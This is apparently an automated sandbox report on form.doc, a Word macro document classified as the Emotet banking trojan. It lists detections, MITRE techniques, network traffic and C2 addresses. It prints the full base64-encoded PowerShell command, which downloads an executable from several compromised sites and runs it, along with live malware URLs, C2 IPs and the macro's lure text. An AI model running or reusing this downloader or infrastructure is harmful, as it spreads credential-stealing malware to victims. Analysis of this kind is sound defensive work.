
Analysis Report form.doc

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 208880
Start date: 17.02.2020
Start time: 20:10:21
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 29s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: form.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winDOC@5/14@3/7
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 30.1% (good quality ratio 28.2%)
  • Quality average: 79.9%
  • Quality standard deviation: 28.3%
HCA Information:
  • Successful, ratio: 85%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • TCP Packets have been reduced to 100
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy  | Score | Range   | Reporting | Whitelisted | Threat | Detection
Threshold | 100   | 0 - 100 |           | false       | Emotet | malicious

Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
Threshold | 5     | 0 - 5 | false                      | Confidence


Classification

Analysis Advice

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 11 | Hidden Files and Directories 1 | Process Injection 12 | Disabling Security Tools 1 | Input Capture 1 | System Time Discovery 2 | Remote File Copy 12 | Input Capture 1 | Data Encrypted 1 | Uncommonly Used Port 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | PowerShell 3 | New Service 1 | New Service 1 | Deobfuscate/Decode Files or Information 11 | Network Sniffing | Security Software Discovery 2 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Commonly Used Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Scripting 2 | Accessibility Features | Path Interception | Scripting 2 | Input Capture | File and Directory Discovery 3 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Remote File Copy 12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Execution through API 13 | System Firmware | DLL Search Order Hijacking | Obfuscated Files or Information 1 | Credentials in Files | System Information Discovery 37 | Logon Scripts | Input Capture | Data Encrypted | Standard Cryptographic Protocol 2 | SIM Card Swap | | Premium SMS Toll Fraud
Exploit Public-Facing Application | Exploitation for Client Execution 3 | Shortcut Modification | File System Permissions Weakness | Obfuscated Files or Information 2 | Account Manipulation | Virtualization/Sandbox Evasion 2 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Non-Application Layer Protocol 3 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface 1 | Modify Existing Service | New Service | Masquerading 111 | Brute Force | Process Discovery 3 | Third-party Software | Screen Capture | Data Transfer Size Limits | Standard Application Layer Protocol 23 | Jamming or Denial of Service | | Abuse Accessibility Features
Spearphishing Attachment | Command-Line Interface 111 | Path Interception | Scheduled Task | Hidden Files and Directories 1 | Two-Factor Authentication Interception | Application Window Discovery 11 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Virtualization/Sandbox Evasion 2 | Bash History | Remote System Discovery 1 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection 12 | Input Prompt | System Network Connections Discovery | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | | Data Destruction

Signature Overview



AV Detection:

Antivirus detection for URL or domain
Source: http://thebluebearyhillproject.com/wp-admin/q07/ | Avira URL Cloud: Label: malware
Antivirus detection for sample
Source: form.doc | Avira: detection malicious, Label: VBA/Dldr.Agent.erhlk
Found malware configuration
Source: UXInit.exe.2556.4.memstr | Malware Configuration Extractor: Emotet {"C2 list": ["04.236.28.47:8080", "104.236.28.47/ch6aFjXP", "104.236.28.47:8080", "98.239.119.52/VgwZzucbO28XwD"]}
Multi AV Scanner detection for domain / URL
Source: thebluebearyhillproject.com | Virustotal: Detection: 9%
Source: http://sportnal.azurewebsites.net/calendar/Xzoo/ | Virustotal: Detection: 11%
Source: http://thebluebearyhillproject.com/wp-admin/q07/ | Virustotal: Detection: 16%
Source: http://teeo.highoninfo.com/wp-admin/1tx/ | Virustotal: Detection: 9%
Multi AV Scanner detection for submitted file
Source: form.doc | Virustotal: Detection: 62%
Source: form.doc | ReversingLabs TitaniumCloud: Detection: 54%
Machine Learning detection for sample
Source: form.doc | Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\UXInit\UXInit.exe | Code function: 4_2_00212180 CryptDecodeObjectEx,

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\317.exe | Code function: 3_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,
Source: C:\Users\user\317.exe | Code function: 3_2_0042FC18 lstrlen,FindFirstFileA,FindClose,
Source: C:\Users\user\317.exe | Code function: 3_2_002130C0 FindNextFileW,FindFirstFileW,FindClose,
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: sportnal.azurewebsites.net
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.2.2:49158 -> 13.85.72.129:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.2.2:49158 -> 13.85.72.129:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.2:49161 -> 71.126.247.90:80
Source: Traffic | Snort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.2:49167 -> 104.236.28.47:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.2:49165 -> 80.86.91.91:8080
Source: global traffic | TCP traffic: 192.168.2.2:49167 -> 104.236.28.47:8080
Downloads executable code via HTTP
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Content-Type: application/x-dosexec
    Expires: Mon, 17 Feb 2020 19:12:36 GMT
    Last-Modified: Mon, 17 Feb 2020 19:12:36 GMT
    Server: Microsoft-IIS/10.0
    Set-Cookie: 5e4ae5a4446f0=1581966756; expires=Mon, 17-Feb-2020 19:13:36 GMT; Max-Age=60; path=/
    Content-Disposition: attachment; filename="WG8ow51j8MD.exe"
    Content-Transfer-Encoding: binary
    X-Powered-By: ASP.NET
    Date: Mon, 17 Feb 2020 19:12:35 GMT
    Content-Length: 491703
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 47 fe 53 f9 26 90 00 f9 26 90 00 f9 26 90 00 3a 29 cf 00 fe 26 90 00 3a 29 cd 00 ee 26 90 00 f9 26 91 00 02 27 90 00 de e0 ed 00 e2 26 90 00 de e0 fd 00 73 26 90 00 de e0 fe 00 72 26 90 00 de e0 ec 00 f8 26 90 00 de e0 e8 00 f8 26 90 00 52 69 63 68 f9 26 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 54 81 3c 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 20 04 00 00 60 03 00 00 e0 07 00 10 0c 0c 00 00 f0 07 00 00 10 0c 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 70 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 6a 0f 00 9c 02 00 00 00 10 0c 00 40 5a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 6c 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 0d 0c 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c d8 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
55 50 58 30 00 00 00 00 00 e0 07 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 20 04 00 00 f0 07 00 00 1e 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 60 03 00 00 10 0c 00 00 5e 03 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected:
    GET /calendar/Xzoo/ HTTP/1.1
    Host: sportnal.azurewebsites.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /wp-admin/1tx/ HTTP/1.1
    Host: teeo.highoninfo.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /wp-admin/q07/ HTTP/1.1
    Host: thebluebearyhillproject.com
    Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 98.239.119.52
Source: Joe Sandbox View | IP Address: 104.236.28.47
Source: Joe Sandbox View | IP Address: 104.236.28.47
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
    POST /ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/ HTTP/1.1
    Referer: http://104.236.28.47/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/
    Content-Type: multipart/form-data; boundary=---------------------------952296233249092
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 104.236.28.47:8080
    Content-Length: 4436
    Connection: Keep-Alive
    Cache-Control: no-cache
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknown | TCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknown | TCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknown | TCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknown | TCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknown | TCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknown | TCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknown | TCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknown | TCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknown | TCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknown | TCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknown | TCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknown | TCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknown | TCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknown | TCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknown | TCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknown | TCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknown | TCP traffic detected without corresponding DNS query: 104.236.28.47
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
    GET /calendar/Xzoo/ HTTP/1.1
    Host: sportnal.azurewebsites.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /wp-admin/1tx/ HTTP/1.1
    Host: teeo.highoninfo.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /wp-admin/q07/ HTTP/1.1
    Host: thebluebearyhillproject.com
    Connection: Keep-Alive
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: sportnal.azurewebsites.net
Posts data to webserver
Source: unknown | HTTP traffic detected:
    POST /ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/ HTTP/1.1
    Referer: http://104.236.28.47/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/
    Content-Type: multipart/form-data; boundary=---------------------------952296233249092
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 104.236.28.47:8080
    Content-Length: 4436
    Connection: Keep-Alive
    Cache-Control: no-cache
Urls found in memory or binary data
Source: UXInit.exe, 00000004.00000002.1382978302.00293000.00000004.00000020.sdmp | String found in binary or memory: http://104.236.28.47/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/
Source: UXInit.exe, 00000004.00000002.1382978302.00293000.00000004.00000020.sdmp | String found in binary or memory: http://104.236.28.47:8080/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/
Source: UXInit.exe, 00000004.00000002.1382978302.00293000.00000004.00000020.sdmp | String found in binary or memory: http://104.236.28.47:8080/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/b
Source: UXInit.exe, 00000004.00000002.1382978302.00293000.00000004.00000020.sdmp | String found in binary or memory: http://104.236.28.47:8080/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/t
Source: UXInit.exe, 00000004.00000002.1382978302.00293000.00000004.00000020.sdmp | String found in binary or memory: http://98.239.119.52/VgwZzucbO28XwD/OLIsQLqeqyzclLWVv/dDqe/wmOuSU/6FaQefiFlRcfZlz/
Source: 317.exe.1.dr | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing?utm_source=error_footer

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
Source: C:\Users\user\317.exe | Code function: 3_2_0041C023 GetKeyState,GetKeyState,GetKeyState,GetKeyState,
Source: C:\Users\user\317.exe | Code function: 3_2_00416206 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
Source: C:\Users\user\317.exe | Code function: 3_2_0043A602 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,
Source: C:\Users\user\317.exe | Code function: 3_2_00438A32 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,
Source: C:\Users\user\317.exe | Code function: 3_2_0042D5F7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,
Source: C:\Users\user\317.exe | Code function: 3_2_00437723 GetKeyState,GetKeyState,GetKeyState,

E-Banking Fraud:

Malicious encrypted Powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABSAG8AbQBiAHcAYgBvAGMAZwBwAGgAYQBmAD0AJwBRAGsAeQBkAHMAZwBlAHIAagBqAGYAJwA7ACQAUgBxAGsAbQBxAGEAcABsAHcAIAA9ACAAJwAzADEANwAnADsAJABNAG0AZgBmAGYAYQBpAHQAbABoAHMAPQAnAE8AcwBqAHEAZgBlAGEAawBmAG0AcwBsACcAOwAkAFIAeABnAG4AZAB1AGMAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgBxAGsAbQBxAGEAcABsAHcAKwAnAC4AZQB4AGUAJwA7ACQAWABjAHMAcQB0AHgAbQB1AGMAYgB1AD0AJwBIAHcAeQBxAGsAZQBtAHAAeQAnADsAJABaAGEAcgBuAG4AYgBsAHcAdgB0AGkAbQA9AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwASQBFAE4AVAA7ACQASQB6AG0AdwB4AGIAeQB1AGMAegA9ACcAaAB0AHQAcAA6AC8ALwBzAHAAbwByAHQAbgBhAGwALgBhAHoAdQByAGUAdwBlAGIAcwBpAHQAZQBzAC4AbgBlAHQALwBjAGEAbABlAG4AZABhAHIALwBYAHoAbwBvAC8AKgBoAHQAdABwADoALwAvAHQAZQBlAG8ALgBoAGkAZwBoAG8AbgBpAG4AZgBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAxAHQAeAAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBiAGwAdQBlAGIAZQBhAHIAeQBoAGkAbABsAHAAcgBvAGoAZQBjAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHEAMAA3AC8AKgBoAHQAdABwADoALwAvAHQAaABlAG0AZQBmAG8AbABrAHMALgBjAG8AbQAvAHQAcgBlAG4AZAB6AGIAZAAvAG8AYQBHAFoAQwBWAHMASgAvACoAaAB0AHQAcAA6AC8ALwB0AGUAYwBoAG8AdABlAGMAaABzAG8AbAB1AHQAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFcAOABtADYALwAnAC4AIgBzAGAAcABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEEAZABwAGYAaAB6AG4AdQBvAG0AbAByAD0AJwBaAHEAZwB1AHAAaQB2AGYAdwB0AG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAEEAcAB1AGgAcQBiAHgAYgAgAGkAbgAgACQASQB6AG0AdwB4AGIAeQB1AGMAegApAHsAdAByAHkAewAkAFoAYQByAG4AbgBiAGwAdwB2AHQAaQBtAC4AIgBkAGAAbwB3AG4AbABvAGEAZABGAGAASQBMAGUAIgAoACQAQQBwAHUAaABxAGIAeABiACwAIAAkAFIAeABnAG4AZAB1AGMAdwApADsAJABIAGgAZQB4AHkAZAB6AHEAcQBoAGcAbQBkAD0AJwBMAHUAdwBmAGUAYQBsAG4AJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABSAHgAZwBuAGQAdQBjAHcAKQAuACIATABgAGUATgBnAHQASAAiACAALQBnAGUAIAAyADQANgAxADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAUgBFAEEAYABUAGUAIgAoACQAUgB4AGcAbgBkAHUAYwB3ACkAOwAkAFIA
eAB1AGcAdwByAGEAZABnAG4APQAnAE0AbgB1AGEAaQBqAHoAaABtAHQAdgAnADsAYgByAGUAYQBrADsAJABYAGkAYgB2AHYAdAB5AGMAPQAnAEMAdwBqAGwAbwBtAHoAaABtAGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBrAGEAYwBlAGcAbgB3AHgAYgA9ACcAWQBqAHkAaABsAHUAbABtAHgAJwA=
Yara detected Emotet
Source: Yara match | File source: 00000003.00000002.998731438.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1382927198.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.995611411.00200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1382911202.00200000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Screenshot number: 4 | Screenshot OCR: Enable content button. I t3 I a 13,2 '00%Q A GE)
Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Document image extraction number: 0 | Screenshot OCR: Enable content button.
Source: Document image extraction number: 1 | Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Document image extraction number: 1 | Screenshot OCR: Enable content button.
Very long command line found
Source: unknown | Process created: Commandline size = 2138
Creates files inside the system directory
Source: C:\Users\user\317.exe | File created: C:\Windows\system32\UXInit\
Detected potential crypto function
Source: C:\Users\user\317.exe | Code function: 3_2_004180EC
Source: C:\Users\user\317.exe | Code function: 3_2_0044A120
Source: C:\Users\user\317.exe | Code function: 3_2_0045E3C3
Source: C:\Users\user\317.exe | Code function: 3_2_0043C4F0
Source: C:\Users\user\317.exe | Code function: 3_2_0045E637
Source: C:\Users\user\317.exe | Code function: 3_2_004506A9
Source: C:\Users\user\317.exe | Code function: 3_2_004567B2
Source: C:\Users\user\317.exe | Code function: 3_2_004507BF
Source: C:\Users\user\317.exe | Code function: 3_2_0045E941
Source: C:\Users\user\317.exe | Code function: 3_2_00462912
Source: C:\Users\user\317.exe | Code function: 3_2_0044AC92
Source: C:\Users\user\317.exe | Code function: 3_2_0043EEA9
Source: C:\Users\user\317.exe | Code function: 3_2_0045B029
Source: C:\Users\user\317.exe | Code function: 3_2_0045F0CB
Source: C:\Users\user\317.exe | Code function: 3_2_00403080
Source: C:\Users\user\317.exe | Code function: 3_2_004531CC
Source: C:\Users\user\317.exe | Code function: 3_2_0045D2F9
Source: C:\Users\user\317.exe | Code function: 3_2_0043F37C
Source: C:\Users\user\317.exe | Code function: 3_2_0043F750
Source: C:\Users\user\317.exe | Code function: 3_2_00457875
Source: C:\Users\user\317.exe | Code function: 3_2_0045D822
Source: C:\Users\user\317.exe | Code function: 3_2_00457A62
Source: C:\Users\user\317.exe | Code function: 3_2_0043FB5C
Source: C:\Users\user\317.exe | Code function: 3_2_00445C6F
Source: C:\Users\user\317.exe | Code function: 3_2_0045DD64
Source: C:\Users\user\317.exe | Code function: 3_2_0044DE61
Source: C:\Users\user\317.exe | Code function: 3_2_0043FF7C
Source: C:\Users\user\317.exe | Code function: 3_2_0020531F
Source: C:\Users\user\317.exe | Code function: 3_2_002159E0
Source: C:\Windows\System32\UXInit\UXInit.exe | Code function: 4_2_0020531F
Source: C:\Windows\System32\UXInit\UXInit.exe | Code function: 4_2_002159E0
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: form.doc | OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation | OLE, VBA macro: Module Aussyxwatwle, Function Document_open
Document contains embedded VBA macros
Source: form.doc | OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\user\317.exe | Code function: String function: 0043D624 appears 96 times
Source: C:\Users\user\317.exe | Code function: String function: 0044556E appears 43 times
Source: C:\Users\user\317.exe | Code function: String function: 0041EC48 appears 56 times
Source: C:\Users\user\317.exe | Code function: String function: 0043CA63 appears 200 times
Classification label
Source: classification engine | Classification label: mal100.bank.troj.evad.winDOC@5/14@3/7
Contains functionality to create services
Source: C:\Users\user\317.exe | Code function: OpenSCManagerW,CloseServiceHandle,CreateServiceW,
Contains functionality to enum processes or threads
Source: C:\Windows\System32\UXInit\UXInit.exe | Code function: 4_2_002142A0 CreateToolhelp32Snapshot,Process32NextW,CloseHandle,
Contains functionality to instantiate COM classes
Source: C:\Users\user\317.exe | Code function: 3_2_004240A6 __EH_prolog3_catch_GS,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance,
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\317.exe | Code function: 3_2_0040C4C0 FindResourceA,LoadResource,FreeResource,
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$form.doc
Creates mutexes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\UXInit\UXInit.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\IBD42A9A6
Source: C:\Users\user\317.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\MBD42A9A6
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVREF1C.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word file
Source: form.doc | OLE indicator, Word Document stream: true
Document contains summary information with irregular field values
Source: form.doc | OLE document summary: edited time not present or 0
Found command line output
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: .........3.i.............3.i....@88.L|.iD.....bl '.i..bl..ykL|.i.............7.i0......i@88..82............. '.i...i....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ...............................u...................u..0.....D...T...........................................>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l..........._._.G.E.N.U.S. . . . . . . . . . .:. .2.D...T...................................L...(...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l......................ul..................u..0.....D...T...................................L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......#..._._.C.L.A.S.S. . . . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...........#.......L...>...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........l.......#..............ul..................u..0.....D...T...........................#.......L.......>..u........
